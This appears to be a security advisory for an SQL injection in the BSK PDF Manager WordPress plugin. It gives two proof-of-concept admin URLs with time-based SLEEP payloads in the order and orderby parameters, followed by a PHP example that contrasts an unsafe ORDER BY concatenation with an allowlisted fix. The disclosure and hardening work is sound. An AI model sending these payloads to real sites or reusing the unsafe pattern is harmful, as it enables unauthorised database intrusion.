The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue.
With at least one BSK PDF Category:
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&order=and+sleep(5)
https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&orderby=last_date`+AND+SLEEP(5)+OR+`last_date
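
Sort parameters end up as an identifier and a keyword in ORDER BY, so the defence is to let the request choose only among fixed strings. The PHP below is an added example, not the plugin's code: it puts a hypothetical unsafe concatenation beside an allowlisted version. The function names and the id and title columns are assumptions; only last_date appears above.

```php
<?php
// Added example with hypothetical names; not taken from the plugin.

// Columns a request may sort on. 'last_date' appears in the advisory;
// 'id' and 'title' are assumed for illustration.
const EXAMPLE_SORTABLE = ['id', 'title', 'last_date'];

// Shape of the flaw described above: request values are concatenated into
// ORDER BY. Value placeholders do not help here, because a column name and
// a sort direction are not values.
function example_order_clause_unsafe(array $req): string
{
    $orderby = $req['orderby'] ?? 'id';
    $order   = $req['order'] ?? 'ASC';
    return "ORDER BY `$orderby` $order";
}

// Hardened form: the request only selects among fixed strings, so nothing
// from the request is ever copied into the SQL text.
function example_order_clause_safe(array $req): string
{
    // is_string() also rejects array input such as ?orderby[]=x
    $orderby = is_string($req['orderby'] ?? null) ? strtolower($req['orderby']) : '';
    if (!in_array($orderby, EXAMPLE_SORTABLE, true)) {
        $orderby = 'id'; // fall back to a fixed default
    }
    $order = is_string($req['order'] ?? null) ? strtoupper($req['order']) : '';
    $order = ($order === 'DESC') ? 'DESC' : 'ASC';
    return "ORDER BY `$orderby` $order";
}

// Constructed inputs: one benign request, then the two parameter values
// from the URLs above after URL decoding.
$samples = [
    ['orderby' => 'last_date', 'order' => 'desc'],
    ['order' => 'and sleep(5)'],
    ['orderby' => 'last_date` AND SLEEP(5) OR `last_date'],
];
foreach ($samples as $s) {
    echo example_order_clause_unsafe($s), '  =>  ',
         example_order_clause_safe($s), PHP_EOL;
}
```

The left-hand column of the output shows how each request value lands in the clause when concatenated; the right-hand column contains only strings from the allowlist.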